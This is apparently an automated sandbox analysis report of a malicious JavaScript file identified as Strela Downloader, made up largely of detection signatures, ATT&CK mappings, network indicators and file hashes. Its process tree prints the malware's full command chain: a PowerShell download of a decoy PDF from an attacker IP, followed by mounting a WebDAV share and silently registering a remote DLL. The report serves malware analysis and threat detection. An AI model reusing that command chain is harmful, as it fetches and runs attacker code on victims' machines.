Windows
Analysis Report
14174249761820017751.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6636 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\14174 2497618200 17751.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 2888 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\157 6222121778 6.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6528 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6052 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 4188 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 5784 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=20 84 --field -trial-han dle=1544,i ,137916421 8887369894 9,11004712 5796120755 62,131072 --disable- features=B ackForward Cache,Calc ulateNativ eWinOcclus ion,WinUse BrowserSpe llChecker /prefetch: 8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 2224 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588259 |
Start date and time: | 2025-01-10 23:09:52 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 9s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 14174249761820017751.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 18.213.11.84, 54.224.241.105, 50.16.47.176, 34.237.241.83, 162.159.61.3, 172.64.41.3, 184.28.90.27, 2.16.168.107, 2.16.168.105, 23.209.209.135, 23.40.179.36, 23.40.179.23, 23.40.179.33, 23.40.179.22, 23.40.179.24, 23.40.179.35, 23.40.179.25, 23.40.179.30, 23.40.179.27, 192.168.2.6, 13.107.246.45, 172.202.163.200, 23.195.92.153, 20.12.23.50
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
17:10:57 | API Interceptor | |
17:11:01 | API Interceptor | |
17:11:02 | API Interceptor | |
17:11:14 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7263116843485157 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0t:9JZj5MiKNnNhoxu0 |
MD5: | 06C1CCCAFD5E59DB5E65185E79C253E8 |
SHA1: | B7E1B72EA0665AB7D4EE6AE800C5DEEE3FEE8EDC |
SHA-256: | 287756089C030804AA123A8E7F853B4B7156A487E1A89774BBD268E29D1E560D |
SHA-512: | F9D1D1C16D014DD9EADE61761DFECF1A0C8BF25B1F072B2F917786C849E0F4284A1DEEDAEF9E637AE52FB3C808E1D950D499EBCEEF89948FDC53DDA84DA1BF5B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7555858124534316 |
Encrypted: | false |
SSDEEP: | 1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL |
MD5: | 79C0A40A46AB31C289EDA7A922454DD5 |
SHA1: | B80E13199DEB298FFEAF0A2AC2916293C54DBB80 |
SHA-256: | 6AA33FC110100F9712171715EAB207BA2BD2E3C9D74FABC466F27FF1994DEBED |
SHA-512: | DF11E896B8D478E073FDC7D1F4EDEB42D5061447F9B7170C8E037DECD65E963D68376D1B2D290436E9AC58C8022A5C54D1091FB2A8BC8D9C77F2629FE097421F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07961306314607716 |
Encrypted: | false |
SSDEEP: | 3:yBKYeQ8PANaAPaU1lbu45illuxmO+l/SNxOf:yBKzmNDPaUju45GgmOH |
